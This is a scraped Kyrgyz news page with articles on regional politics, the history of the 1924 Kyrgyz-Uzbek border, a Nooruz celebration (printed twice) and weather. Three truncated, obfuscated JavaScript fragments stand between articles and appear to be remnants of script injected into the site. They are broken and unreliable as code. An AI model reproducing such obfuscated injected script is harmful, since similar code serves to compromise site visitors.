Menu

Узарга шайлоочулары нараазы болушуп...

Гезитибиздин өткөн санында СДПКчы депутат Узар Жылкыбаевдин мандатын өткөрүп кете турганын жазган элек. Ысык-Көл районундагы анын шайлоочулары нааразы болушуп, «болгону биздин райондон бир депутат болсо, ал да жөн иштебей кетип калабы» – деп чуу көтөрүп жиберишкен экен.

Узар мырза жакын арада эч кайда кетпейт жана ман­датын да тапшырбайт экен. Эми шайлоочуларына берген убадаларын аткарып, Ысык-Көл районуна караштуу орус айылдарынын атын кыргызчалатуу боюнча маселени ЖКда көтөрүп, маанилүү иш жасаса деген эле тилек. Бул жигит азырынча «балык» депутаттардын катарын толуктап жатат. Бара-бара такшалат чыгаар. Үмүтузбүздү үзбөй туралычы…

Булак: “Ачык саясат”

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kyrgyztoday.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Казакстанда шайлоонун болжолдуу жыйынтыктары чыкты

Казакстандын Борбордук шайлоо комиссиясы парламенттин төмөнкү палатасына мөөнөтүнөн мурда өткөн шайлоонун алдын-ала жыйынтыктарын чыгарды.

Акыркы маалыматтарга караганда, “Нур Отан” партиясына 82,15 % шайлоочу добуш берди, Казакстан элдик коммунистик партиясы 7, 14%, “Ак жол” 7,18%, “Бирлик” 0,29, Жалпы улуттук социал-демократиялык партиясы 1,18 %жана “Ауыл” партиясы 2% упай топтоду.

Парламентке жол ача турган жети пайыздык бөгөттү “Нур Отан”, “Ак жол”, Казакстан элдик коммунистик партиясы багындырды. Шайлоонун акыркы жыйынтыгы 26-марттан кечикпей чыгат.

Европадагы коопсуздук жана кызматташтык уюмунун байкоочулар миссиясы шайлоонун жүрүшүндө олуттуу алешемдиктерге жол берилгенин жарыялады. Алардын пикиринде, жарандардын саясий укуктары чектелип, чыныгы атаандаштыкка жол берилген жок.

Байкоочулар Казакстанда шайлоо системасы реформага муктаж экендигин кошумчалашты.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kyrgyztoday.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kyrgyztoday.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Арслан Койчиев, журналист: Ферганалык түрктөрдү талашуунун тарыхынан же Шералы Жураевге жолуккандан кийинки ойлор

Ирегелеш өзбек калкынын Шералы Жураев (1947-жылы туулган) ысымдуу арген үндүү ашкере таанымал ырчысы бар эмеспи, өмүрүндө миңден ашуун абандуу ыр жараткан ошол алп ырчы менен бир курдай маңдай-тескей келип, буйрук экен, дүйүм даам жайылган дасторкон үстүндө итабар убакытка баарлашып калдым. Чынымды айтсам, көңүлүмө түйүп жүргөн бир кептин учугун жандырып билмекке ынтызарлыгымдан улам, ыңгайын таап, жанына атайы жакындап барган элем. Анткени, асакелик атактуу абабыздын түп насили “түрк” уруусунан болоорун тээ илгериде кулагым чалып, эшиткеним бар эле. Кудай жалгап, ошол кептин чын-төгүнүн өзүм үчүн тактап алуунун, болгондо да ашулачынын өз оозунан угуунун оңтою келип турду ошентип.
Оболу “кыргыз баласы” экенимди билип, кыса-кыса кол алышып таанышкан соң Шералы аба саамга ойлонуп турду да, Алай тууралуу кеп салып калды бүйүрүмдү кызытып. Алыскы Алай тоолорунун мен эзели болуп көрбөгөн күр жайлоолорун бирден эргип санап, бала чагынын бир үзүмү ак жалтаң аскалардын, көк жалтаң зоокалардын койнундагы шалба-шибердүү өтөктөрдө өткөнүн эстеп ийди. Көрсө, жай сайын сүрө-сүрө мал айдап, көчүп-конуп жайлоого чыгышчу экен.
Гүлдүү чайнектеги демделүү көк чайдан алдыбыздагы көк чыныга утур кап ортолото куюп коюп, жайбаракат маашырлана ууртап, кыйлага кобурашып отурганыбызда, жана бир ыңгайын келтирип, сөздүн нугун ал кишинин тек-жайына бурдум. “Асакеден болом” – деди аксакал. “Опей, акетай, асакеликтериң чылгый эле “түрк” деген түптүү эл болот эмеспи?” – дейм. “Ооба, ооба, мен дагы түркмүн” – деди жарыктык киши тайсалдабай. “Түрктүн ичинен кимиси болосуңар?” – дейм кадаланып сурап. “Калтатаймын” – деди аксакал. “Атаганат!” дедим ичимен армандуу. Жообун көңүлүмө түйүп койдум. “Кыргызстандын Өзбекстан менен чекаралаш райондорунда да “түрк” деген эл жашайт. Жыш жашайт. Силерден айырмаланып, алар “өзбек” деген атты туташ чанып, “кыргыз” да эмеспиз дешип, кыргыз бийликтеринен “түрк” деген көөнө атын кайтарып берүүнү талап кылышууда” – дедим. Ак эткенден так эте “өзбегим эле өзбегим” деп, өмүр бою өпкө-жүрөгүн садага чаап ырдап калган атактуу ырчы:“Билем, билем” – деп башын ийкегиледи. Экөөбүз тең жана бир саамга унчукпай, көк чайдан жарыша ууртап калдык.
Чокусуна ала допу кондурган башын утур-утур ийкегилеп калганында, аксакалды эмне түркүн ой каптады билбейм, Ферганалык түрк калкынын, түрк боордошторунун келечек тагдыры эмне деген сары санааны чектирди, аны да билбейм, а бирок маган:“Атаңгөрү, Жусуп Абдыракмановдун акылын айныбай укканыбызда, Шералы Жураев азыр кыргызча ырдап жүрмөктүр” деген ой кетти. Дагы бир жолу ичимен кайрып, “Атаганат!” дедим. Анткени, көк жыттанган эски документтерден өткөн кылымдын жыйырманчы жылдарында болуп өткөн бир окуянын таржымалы тууралуу окуганым – улуттук мамлекеттүүлүктү түптөөнүн тарыхый озуйпасы моюндарына илинген саясий ишмерлердин бир кылка муунун кызыл чеке түшүрүп талаштырган мындай бир факты эске түшүп, ошол фактынын тегерегиндеги каңырык түтөткөн окуялар элестеп кетип жатпайбы.
1924-жыл. Борбор Азияда улуттук жиктелүү процесси капыл-тапыл башталып, аймакты эзелтеден жердеген чоң-кичине элдердин курамынан азыркы алты улутту: казак, өзбек, кыргыз, түркмөн, тажик, каракалпак улуттарын айрым уюштуруу жана алардын идирек-кудуретине чактап өз мамлекеттик түзүлүштөрүн аныктап берүү долбоору жүзөгө кызуу ашырылып жаткан кез. Аталган алты улуттук түзүлүштүн чектерин ажыратып, чек араларын аныктап берүү иши татаал, өтө машакаттуу болгону белгилүү. Ошонун ичинде Кыргызстан менен Өзбекстандын чек араларын аныктоо өзгөчө түйшүк менен коштолгон.
Маселенин тамыры менен табияты мындай эле: келечекте “өзбек” жана “кыргыз” деп аталчу эки улуттун жайгашкан жерлерин ой-тоодон бери аралата аныктоодон сырткары, Фергананы байырлаган майдараак элдердин, атап айтканда, же өзбекке кошуларын билбей, же кыргызга кошуларын билбей, эки ортодо арабөк калган Ферганалык түрктөрдүн, кыпчактардын жана башка майдараак элдердин тагдыры талаш жаратып калат. “Өзбекстан” долбоорунун көсөмдөрү өктөө чыгып, “түрк-мүрк”, “кыпчак-сыпчак” дегизбей эле, баарын туташ “өзбек” же “көчмөн өзбек” деп атоону сунуштайт. Сунуштамак турсун, жүйөсү өтүп, Москваны ынандырып да ийишет. Саал мурдараакта эле жоголуп кете жаздап аман калган, эми өлүп-тириле өжөрлөнүп атып “автоном облус” деген статуска араңдан илинген кыргыздарың алардын жүйөсүнө көшөрүп көнбөйт. Автоном облустун жетекчилери кыпчакты да талашып, түрктөрдү да талашып, ал ортодо каракалпакты да кошо талашып, ансыз да чиеленген маселени андан-ары ырбатат.
Ошол учурда “автоном облустун” башатында Сыдыков-Абдыракмановдун мууну тургандыктан, 1924-жылкы улуттук жиктелүү учурундагы эл талаш, журт талаштын башында да ушул кишилер турган деп эсептейм. Учурунда Азия менен Европаны бирдей аралап, бирдей дүңгүрөтүп, не бир замандарды баштан кечирген кайран кыпчак этносунун так жыйырманчы кылымдын ирегесине жеткенде өз ураанын чакырууга алы калбай деми сууп, үн катып өз таламын айтууга чамасы жетпей ындыны өчүп, жүдөңкү тартып, эми кара-кыргыз автоном облусу менен Өзбек ССРинин талашына кантип түшкөнүн кыябы келгенде жазаарбыз, бирок бул саам түрктөрдү талашуунун таржымалына көбүрөөк токтолууну эп көрүп турам.
Ошол жылдарга тиешелүү архивдик документтерди аңтарып калган адис катары айтпадымбы, Кыргызстан менен Өзбекстандын чек арасын ажыратуу өзгөчө түйшүк менен коштолгон, ал эми улуттук жиктелүү деген иш-чараны баштап алган Москванын айласын гана куруткан. Түйшүктүн масштабын ушундан билиңиз, кыргыз жетекчилери жалаң эле “түрк маселесине” байланыштуу Араван, Булак-Башы, Мархамат, Маняк, Кулу деген болуштарды бирин калтырбай, элестүүрөк айтканда, азыркы эле Анжиян менен Фергана шаарларынын арасын бүтүн бойдон өткөрүп берүү маселесин кабыргасынан коюп, кыйлага чейин Өзбекстандын айткан-дегенине ынабай коёт. Эмесе, ушул аталган болуштардын ар биринин тегерегинде айтылган эки тараптын жүйөлөрүнө айрым-айрым токтололу.
Оболу кыргыз облусунун жетекчилери этностук азчылыктарды дүңүнөн “өзбек” деп атай салууну макул таппай, “ата-жотодо жок андай жосунду кайдан тапкансыңар” деп нааразы болгондон, мындай жүйөсүн каршы коёт:“түрктөр жашоо образы боюнча кыргыздарга жакын эл жана өзбектер менен эч кандай байланышы жок” (Кыргызстандын Мамлекеттик Борбордук архиви. 20-фонд. 1-каттоо. 93-иш кагазы. 100-бет). Акыйкатында ошондой эле. Жарым көчмөн турмушта жашап, мал чарбачылыгы менен алектенген түрк уруулары материалдык маданияты жагынан да, рухий маданияты жагынан да кыргыздарга жакыныраак болчу. Аралаш жайгашкандан, айыл-кыштактары да, жаздоо-жайлоолору да чогуу болуп, өз ара интеграциялык жараяндын кучагында камыр-жумур жашап жатышкан.
Кыргыз облусунун жетекчилеринин жогоркудай жобону айтып, Москвага дейре угуза айгай салышына түрктөрдүн жүүнү тирүү урууларынын да чырылдап чыгышы себеп болгон. Колу жеткен жерлерге чейин кат ташташып, үнү угулган жерлерге чейин арызданып барышкан түрктөр кыргыз боорлору менен чогуу болууну жакташкан. “Турмуш-тиричилиги бир-бириникинен анчалык деле айырмаланбаган түрк менен кыргыз калкы тарыхый жактан таламдаш болгондон улам Кыргызстанга кошулууну өтүнүүдө,” – деген билдирүүнү окуйбуз архивдин жедеп саргайган эски кагаздарынан (Кыргызстандын Мамлекеттик Борбордук архиви. 20-фонд. 1-каттоо. 418-иш кагазы. 50-барак).
Маселен, Булак-Башы болушун алалы. Мындай аталыштагы жер азыр да бар. Өнүп-өөрчүп отуруп, азыр район статусуна ээ. Намангандан жыйырма чакырым алыста. Мына ушул жердеги түрктөр менен кыргыздарды чогуу алып санаганда калктын токсон пайызын түзөөрүн бетке кармаган кыргыз жетекчилиги Булак-Башыны олку-солкусуз Кыргызстанга кошууну өтүнөт. Булак-Башынын түрктөрү да ушуга көнгөн. Ал турсун Москвага, туура эле Бүткүлсоюздук Борбордук Аткаруу Комитетине арыз жолдошкон. Бирок 1925-жылкы жаңыча усулдагы эл каттоого ылайык “түрк” аттуунун баары өңчөй “өзбек” деп каттоого алынат дагы, “кыргыздар жашаган айылдар азчылыкты түзөт” деген бүтүмдүн негизинде Булак-Башы болушу Өзбекстанга бириктирилген.
Мархамат болушун мисалга тарталы. Азыр ал жер “Мархамат району” деп аталат. Кыргызстандын Араван району менен чектеш. Кара-кыргыз облусун жетектегендердин эсебинде болуштун калкынын 80-85 пайызын түрк менен кыргыз түзгөн. Ошондуктан Мархамат болушун Кыргызстанга кошуу маселесинде эки анжы ой болушу мүмкүн эмес деп санашкан.
Кулу болушундагы жагдай дагы ушундай. Адегенде облус жетекчилиги болуштун кыргыздар жашаган ондон ашуун кыштагын гана кошууну суранган. Бирок Ош округун билген кызматкерлер болуштун калкы чылгый эле түрк менен кыргыз экенин көзгө сайып көрсөтүп, чогуу санаганда “80 пайызга, айрым жерлеринде 100 пайызга” жетээрин аныктап чыгышкан (Кыргызстан Мамлекеттик Борбордук архиви. 21(жашыруун)-фонд, 2-каттоо, 26-иш кагазы, 38б- барак).
Тилекке каршы, Булак-Башынын мисалындай эле, Мархамат менен Кулудагы бир тууган түрк жана кыргыз калктарын чогуу кароо, аларды күчтөп ажыратпоо өтүнүчү Москвадагы үлкөн лөктөрдүн көңүлүнө илинбей калды, 1925-жылкы чукул эл каттоонун жаңычыл ыкмасы колдонулуп, түрк калкынын аты заматтын ичинде “өзбек” деген атка алмаштырылды дагын, Кыргызстанды Мархамат менен Кулу болуштарынан түңүлттү. Түрк калкын кошо түңүлттү. Артынан Маняк болушу да өтүп кетти.
Араван болушу тууралуу кеп өзгөчө. Анткени, ушу бүгүнкү күндөрү да Кыргызстандын айрым жетекчилери чала сабаттыгынан улам тилинен жаңылып, райондун улуттук курамы же андагы этностук жагдай тууралуу кеп козголгондо оозуна келгенди оттоп жүрүшкөнүнө күбөбүз.
Араван болушу бир-эки жылдын ичинде эле бирде Кыргызстанга, бирде Өзбекстанга өткөрүлүп, туруктуу статусу аныкталбай, элди да, бийликтерди да кыйнады. Ошондо кыргыз жетекчилиги мынамындай жүйөнү келтирип, айтканынан кайтпай койгон: болушта 4000ге жуук кожолук болсо, анын 1257иси – кыргыздардыкы, 616ысы – түрктөрдүкү, 1467иси – өзбектердики. Калганы – тажик, уйгур, лөлүлөр. Башкача айтканда, кыргыздар менен түрктөр көпчүлүктү түзүшөт дагы, өзбектер Аравандын 37 пайызын эле түзөт (Кыргызстан Мамлекеттик Борбордук архиви. 21(жашыруун) – фонд, 2-каттоо, 26-иш кагазы, 38б-барак). Мына ушундай аргументтерди келтирүүнүн натыйжасында гана Кыргызстан жетекчилери талашкан тараптарды кепке-сөзгө келтирип, Араванды эптеп кайрып алууга жетишкен. Албетте, кыргыздар менен чогуу болууну көздөгөн түрктөрдүн каалоо-тилеги да маселенин оң чечилишине көмөк болгон.
Деген менен, автоном облусунун Жусуп Абдыракманов баштаган жетекчилери канчалык күч үрөшсө да бир тууган түрк калкынын негизги массасын Кыргызстанга кошо алышкан эмес. Ошентип, Бүткүлсоюздук Борбордук Аткаруу Комитетине чейин арыз артынан арыз жөнөтүп, канчалык какшанышса деле болбой урматтуу Шералы Жураевдин ата-бабалары кыргыздарга кошула албай калышкан экен. Ал эми, кошулганда кандай болмок? Анда, Шералы акебиз кыргызча-түркчө аралаштырып, заңкылдап ырдап жүрмөктүр. Атактуу ырчы менен маңдай-тескей отурчумда тээ илгери болуп өткөн окуяны ойлоп-эстеп ийгеним ушундан.
Түрк калкынын кийинки тагдыры кандай болду? Өзбекстан тарабында калгандарды билбейм, бирок Кыргызстан тарабында калгандар тууралуу кандай кам көрдүк? Арадан ондогон жылдар өттү. Баягыда чырылдап-ызылдап калып калган түрк элин эстеген советтик этнографтар (асыресе, Я.Р. Винников) элүүнчү-алтымышынчы жылдары Ош облусун аралап көрүшөт. Ошондо алар дагы эле “түркпүз” деп көшөргөн элди көрүшкөн. Паспортунда “өзбек” деп жазылышканы менен, “түрк” атынан түңүлбөй жүрүшкөнүнө күбө болушкан. Бирок Абдыракмановдордун мууну талашып алган элди боорго тээп, Советтик Кыргызстандын бийликтери аларды күчтөп “өзбек” деп жаздырууну кийинки жылдары деле уланта беришти.
Күчтөп жазуу эгемен заманда деле уланып жатканына өзүм да күбө болдум. Эл каттоодон кийинки мезгил болчу, Араван жакка жумуштап барган элем. “Төө-Моюн” деген каналдын жээгинде тегерекке көз чаптырып, өйдө-ылдый басып турсам, кетмен-айрыны арта көтөрүнгөн, аял-эркеги аралаш үч-төрт киши келип калды жаныма. Аркы-теркини кобурашып турдук. “Эл каттоо купулуңарга толдубу?” – деп кызыктым. “Түркпүз десек, кыргыздар бизди түк укпай койду”, – деди улуурагы эки көзүн жылтыратып. Чоң акимчиликтин кишисинен бетер ак көйнөк кийинип, көз айнекти тартынып, колума булгаары папке көтөрүнүп турсам, ушул киши арыз-муңубузду угат, жеткирчү жерге жеткирет деген үмүттө айтты окшойт.
Арслан Койчиев, “Кутбилим” гезитинин баяндамачысы
Атайын Кyrgyztoday.kg сайты үчүн

Кыргызстан кыргыз-өзбек чек ара жаңжалы боюнча ЖККУга (ОДКБ) кайрылды

Бүгүн, 22-мартта Жамааттык коопсуздук келишим уюмунун (ЖККУ-ОДКБ) Москвадагы Туруктуу кеңешчилигинин кезексиз жыйыны болуп өтөт. Жыйын ЖККУнун катчылыгындагы кыргыз өкүлчүлүгүнүн демилгеси менен уюштурулган. Бул тууралу КР Тышкы иштер министрлигинин басма сөз кызматы билдирет.
Жыйында Кыргызстандын ЖККУдагы Туруктуу жана толук ыйгарымдуу өкүлү А. Мамбетсеитов ЖККУнун катышуучу өлкөлөрүнүн Москвадагы Туруктуу кеңешчиликтеги өкүлдөрүнө Кыргыз Республикасынын Жалал-Абад облусунун Аксы районундагы кыргыз-өзбек чек арасында түзүлгөн чек ара жаңжалы боюнча расмий билдирүү жасайт.

Фотобаян - Жалал-Абадда Нооруз майрамы белгиленди

Бүгүн, 21-мартта Жалал-Абад шаарынын борбордук Эркиндик аянтында Нооруз майрамы — Чыгыш мусулман элдеринин Жаңы жыл майрамы чоң салтанат менен белгиленди деп маалымдады өкүлдүн басма сөз катчысы. Эртең мененки саат 10-до Жалал-Абад шаарындагы борбордук Эркиндик аянты шаардын тургундары, согуштун жана эмгектин кадырман ардагерлери, атайын орто жана жогорку окуу жайларынын студенттери, шаардык жана областтык мекеме-уюмдардын эмгек жамааттары менен район-шаарлардан келишкен конокторго жыкжыйма толду.
Нооруз майрамынын катышуучуларына Жалал-Абад шаарынын мэри Салайдин Авазов атайын куттуктоо сөзү менен кайрылды. Андан кийин куттуктоо үчүн сөз өкүл Жумагүл Эгембердиевага берилди.
ЖА Нооруз3
-Дүйнө жүзүндөгү бардык мусулман өлкөлөрүндө тээ алмустактан бери эле Нооруз эң ыйык майрам катары белгиленип келет. Илгертен бери эле Нооруз бул – күн менен түн теңелген, Чыгыш элдери кылымдардан бери кастарлап келе жаткан Жаңы жылдын келүүсү катары элибиз тарабынан шаңдуу майрамдалып келе жатат. Нооруздан элибиз илгери үмүт менен жакшылык менен токчулукту, элдин биримдиги менен тынчтыгын жана ынтымакчылыгын самашкан.
ЖА Нооруз
Жаңырган жылда эл-журттун амандыгын, мал-жандын түгөлдүгүн тилешип, эгин менен кудай берген ырыскынын берекелүү мол болуусуна үмүт-арзуусун артышкан. Арпа менен буудайдан көжө бышырып, жер-жерлерде сүмөлөк кайнатышып, ар бир үй-бүлө берекелүү түркүн сый тамактарын жасап, дасторконго даамдын жети түрүн коюшуп, айыл эли менен биргеликте даам татышкан. Ноорузда жаңы кийимдер кийилип, жакшы арзуу үмүт-тилектер айтылат. Айлана жаз шаңына бөлөнүп, улуу-кичүүлөр чогулуп, улуттук оюн-зооктордун мелдештери өткөрүлгөн. Эски таарынычтар менен капачылыктар биротоло унутулуп, алдыга жакшы ой-тилектер менен асыл максаттар коюлган.
ЖА Нооруз10
Быйылкы жылды Президентибиз Алмазбек Атамбаев тарабынан «Тарых жана маданият жылы» деп жарыялады. Кудай буйруса бул багытта көп иштерди аткаруу милдеттери алдыбызда турат. Ошондуктан областыбыздын көп улуттуу ынтымактуу калкы мамлекетибиздин бакубат кубаттуу болуусу биримдик менен
достукта экендигин туура түшүнүшөт деп ойлоймун. Ал эми бай жана дөөлөттүү жакшы жакшоо ар бирибиздин аракетибизге жана өзүбүздүн ак маңдай тер агызып эмгектенүүбүзгө байланыштуу экендигин жадыбыздан чыгарбоого тийишпиз. Жараткандын ушул улуу күнү болгон Нооруз майрамында бири-бирибизге күйүмдүү, бири-бирибизге камкор жана тутумдуу бололу. Ыйык Нооруз майрамында бири-бирибизге жакшы каалоо тилектерди айтсак, ал сөзсүз түрдө ишке ашаарын унутпайлы.
ЖА Нооруз5
Жер шары жакшылыктарга бөлөнгөн ушул куттуу Нооруз майрамында мен ар бириңиздерге бекем-ден соолук, үй-бүлөңүздөргө бакты-таалай каалаймын. Кадырман согуш жана эмгек ардагерлерине карылыктын бакубат доорун сүрүүлөрүн чын дилимден тилеп кетемин. Улуу-кичүүлөрдүн баарына быйылкы жылга койгон асыл ой-максаттарынын турмушка ашуусун каалаймын. Кут даарыган Жалал-Абад жергесинде ар дайым тынчтык менен биримдик болуп, ар дайым балдарыбыздын күлкүлөрү жаңырсын. Нооруз майрамыңыздар куттуу болсун, урматтуу мекендештер жана кадырлуу коноктор!,- деди өкүл Жумагүл Эгембердиева.
Нооруз майрамынын катышуучуларын областтык ардагерлер кеңешинин төрагасы Садырбек Качкынбаев, Кыргызстан элдеринин Ассемблеясынын Жалал-Абад областындагы өкүлү Бахрам Марасулов да куттуктап кетишти.
ЖА Нооруз4
Нооруз майрамдык салтанаты областтык Барпы театрынын жана Токтосун Тыныбеков атындагы областтык филармониянын артисттеринин кеңири программадагы концерти жана театрлдаштырылган оюн-зооктор менен улантылды. Нооруз майрамы областтын бардык район-шаарларында жана айыл аймактарында элдин активдүү катышуусу менен майрамдалып жатат. «Жаздын бир күнү – жылды багат» дегендей ушул күнү айрым дыйкандар менен фермерлер бул күнү кадимкидей талааларда эмгек күүсү менен алектенип өткөрүшкөндүгүн дагы белгилей кетүү абзел.
ЖА Нооруз6
Нооруз майрамында областтын борборунда жана район-шаарларда спорттун бир катар улуттук түрлөрү боюнча мелдештер өткөрүлдү. Мындан сырткары жер-жерлерде айыл чарба азык-түлүктөрүн сатуу боюнча жарменкелер уюштурулуп, калкты соода-сатык жана тамак-аш менен тейлөө кызматтары уюштурулду. Коомдук тартипти күчөтүлгөн шартта милиция кызматкерлери камсыздап, кырдаалды тыкыр көзөмөлгө алып турушту.
ЖА Нооруз7
ЖА Нооруз8
ЖА Нооруз9
Жолдошбай Осмонов, журналист

Узбекистан переходит от угроз к действиям

Узбекский президент Ислам Каримов перешел от угроз к действиям. 18 марта военные Узбекистана вошли на неописанный участок, перекрыли участок автодороги Кербен – Ала-Бука, выставили два БТР и военнослужащих
Стоит напомнить, что еще в ноябре 2012 года во время двусторонней встречи в Астане узбекский президент заявлял, что в Центрально-Азиатском регионе скоро может начаться война за водные ресурсы. Эта угроза Каримова была направлена в адрес своего соседа – Кыргызстана.
Пренебрегая нормами международного права и двусторонними соглашениями, узбекская сторона буквально захватила спорную территорию с использованием военных сил и бронированной техники.
Неспроста был захвачен именно этот участок. Достаточно легко объяснить стратегические цели соседнего государства, ведь это была продуманная кампания. В 14 километрах от узбекской границы на кыргызской территории находится Орто-Токойское водохранилище, поэтому захват участка в Аксыйском районе был нужен для прорыва военных на Орто-Токойское водохранилище.
Запрет кыргызской стороной проезда гуманитарной экспедиции для этнических узбеков, проживающих вокруг водохранилища, является предлогом для разжигания конфликта. Ведь ни для кого не секрет, что в действительности Каримова никогда не волновала судьба узбеков, проживающих на территории Ферганской долины. Вспомним кровавое подавление Андижанских событий 2005 года. И тем более этнических узбеков, проживающих за ее пределами.
Несмотря на информационную блокаду в Узбекистане, просачиваются тревожные известия от жителей узбекских приграничных сел Нанай и Манай Наманганской области о том, что в их селах стянуто более 50 единиц тяжелой военной техники и около 3000 военнослужащих в полной боевой амуниции, которые размещены в домах местных жителей. При этом из указанных сел в спешном порядке вывозятся пожилые люди и дети вглубь территории Узбекистана.
Агрессивная политика Узбекистана на сегодняшний день – угроза не только Кыргызстану, но и безопасности всего региона, это должны помнить все. Своими действиями страна пытается спровоцировать Кыргызстан на неправомерные действия, при этом объясняя свои шаги усилением безопасности во время Нооруза. Более того, решительность Узбекистана наводит на мысль о том, что агрессия с узбекской стороны была совершена с поддержки пресловутых третьих сил.
Действия узбекской стороны вызывают настороженность и опасения населения на юге страны, которое пережило трагические события 2010 года. Этим также не преминут воспользоваться оппозиционеры и другие силы, которым все равно, на чем зарабатывать политические очки.
Источник: “Вечерний Бишкек”

Кыргызгидромет: 22-мартагы аба ырайы

22-мартта ала булут каптап турат, жаан-чачын болбойт. Тоолуу райондордо жана тоо этектеринде жолдор тоңголок, тайгак болот. Түштүк-батыш тараптан келген шамалдын ылдамдыгы секундасына 2-7 метрге жетет.
Абанын температурасы:
Чүйдө түнкүсүн 1…6, күндүз 17…22,
Баткен, Таласта түнкүсүн 1…6, күндүз 16…21,
Ош жана Жалал-Абадда түнкүсүн 2…7, күндүз 18…23,
Ысык-Көлдө түнкүсүн -2…-7, күндүз 5…10,
Нарында түнкүсүн -3…-8, күндүз 8…13,
Бийик тоолуу райондордо түнкүсүн -15…-20, күндүз -1…-6.
Бишкекте ала-булут каптап турат, жаан-чачын болбойт. Абанын температурасы түнкүсүн 3…5, күндүз 18…20.

Фотобаян - Жалал-Абадда Нооруз майрамы белгиленди

Бүгүн, 21-мартта Жалал-Абад шаарынын борбордук Эркиндик аянтында Нооруз майрамы — Чыгыш мусулман элдеринин Жаңы жыл майрамы чоң салтанат менен белгиленди деп маалымдады өкүлдүн басма сөз катчысы. Эртең мененки саат 10-до Жалал-Абад шаарындагы борбордук Эркиндик аянты шаардын тургундары, согуштун жана эмгектин кадырман ардагерлери, атайын орто жана жогорку окуу жайларынын студенттери, шаардык жана областтык мекеме-уюмдардын эмгек жамааттары менен район-шаарлардан келишкен конокторго жыкжыйма толду.
Нооруз майрамынын катышуучуларына Жалал-Абад шаарынын мэри Салайдин Авазов атайын куттуктоо сөзү менен кайрылды. Андан кийин куттуктоо үчүн сөз өкүл Жумагүл Эгембердиевага берилди.
ЖА Нооруз3
-Дүйнө жүзүндөгү бардык мусулман өлкөлөрүндө тээ алмустактан бери эле Нооруз эң ыйык майрам катары белгиленип келет. Илгертен бери эле Нооруз бул – күн менен түн теңелген, Чыгыш элдери кылымдардан бери кастарлап келе жаткан Жаңы жылдын келүүсү катары элибиз тарабынан шаңдуу майрамдалып келе жатат. Нооруздан элибиз илгери үмүт менен жакшылык менен токчулукту, элдин биримдиги менен тынчтыгын жана ынтымакчылыгын самашкан.
ЖА Нооруз
Жаңырган жылда эл-журттун амандыгын, мал-жандын түгөлдүгүн тилешип, эгин менен кудай берген ырыскынын берекелүү мол болуусуна үмүт-арзуусун артышкан. Арпа менен буудайдан көжө бышырып, жер-жерлерде сүмөлөк кайнатышып, ар бир үй-бүлө берекелүү түркүн сый тамактарын жасап, дасторконго даамдын жети түрүн коюшуп, айыл эли менен биргеликте даам татышкан. Ноорузда жаңы кийимдер кийилип, жакшы арзуу үмүт-тилектер айтылат. Айлана жаз шаңына бөлөнүп, улуу-кичүүлөр чогулуп, улуттук оюн-зооктордун мелдештери өткөрүлгөн. Эски таарынычтар менен капачылыктар биротоло унутулуп, алдыга жакшы ой-тилектер менен асыл максаттар коюлган.
ЖА Нооруз10
Быйылкы жылды Президентибиз Алмазбек Атамбаев тарабынан «Тарых жана маданият жылы» деп жарыялады. Кудай буйруса бул багытта көп иштерди аткаруу милдеттери алдыбызда турат. Ошондуктан областыбыздын көп улуттуу ынтымактуу калкы мамлекетибиздин бакубат кубаттуу болуусу биримдик менен
достукта экендигин туура түшүнүшөт деп ойлоймун. Ал эми бай жана дөөлөттүү жакшы жакшоо ар бирибиздин аракетибизге жана өзүбүздүн ак маңдай тер агызып эмгектенүүбүзгө байланыштуу экендигин жадыбыздан чыгарбоого тийишпиз. Жараткандын ушул улуу күнү болгон Нооруз майрамында бири-бирибизге күйүмдүү, бири-бирибизге камкор жана тутумдуу бололу. Ыйык Нооруз майрамында бири-бирибизге жакшы каалоо тилектерди айтсак, ал сөзсүз түрдө ишке ашаарын унутпайлы.
ЖА Нооруз5
Жер шары жакшылыктарга бөлөнгөн ушул куттуу Нооруз майрамында мен ар бириңиздерге бекем-ден соолук, үй-бүлөңүздөргө бакты-таалай каалаймын. Кадырман согуш жана эмгек ардагерлерине карылыктын бакубат доорун сүрүүлөрүн чын дилимден тилеп кетемин. Улуу-кичүүлөрдүн баарына быйылкы жылга койгон асыл ой-максаттарынын турмушка ашуусун каалаймын. Кут даарыган Жалал-Абад жергесинде ар дайым тынчтык менен биримдик болуп, ар дайым балдарыбыздын күлкүлөрү жаңырсын. Нооруз майрамыңыздар куттуу болсун, урматтуу мекендештер жана кадырлуу коноктор!,- деди өкүл Жумагүл Эгембердиева.
Нооруз майрамынын катышуучуларын областтык ардагерлер кеңешинин төрагасы Садырбек Качкынбаев, Кыргызстан элдеринин Ассемблеясынын Жалал-Абад областындагы өкүлү Бахрам Марасулов да куттуктап кетишти.
ЖА Нооруз4
Нооруз майрамдык салтанаты областтык Барпы театрынын жана Токтосун Тыныбеков атындагы областтык филармониянын артисттеринин кеңири программадагы концерти жана театрлдаштырылган оюн-зооктор менен улантылды. Нооруз майрамы областтын бардык район-шаарларында жана айыл аймактарында элдин активдүү катышуусу менен майрамдалып жатат. «Жаздын бир күнү – жылды багат» дегендей ушул күнү айрым дыйкандар менен фермерлер бул күнү кадимкидей талааларда эмгек күүсү менен алектенип өткөрүшкөндүгүн дагы белгилей кетүү абзел.
ЖА Нооруз6
Нооруз майрамында областтын борборунда жана район-шаарларда спорттун бир катар улуттук түрлөрү боюнча мелдештер өткөрүлдү. Мындан сырткары жер-жерлерде айыл чарба азык-түлүктөрүн сатуу боюнча жарменкелер уюштурулуп, калкты соода-сатык жана тамак-аш менен тейлөө кызматтары уюштурулду. Коомдук тартипти күчөтүлгөн шартта милиция кызматкерлери камсыздап, кырдаалды тыкыр көзөмөлгө алып турушту.
ЖА Нооруз7
ЖА Нооруз8
ЖА Нооруз9
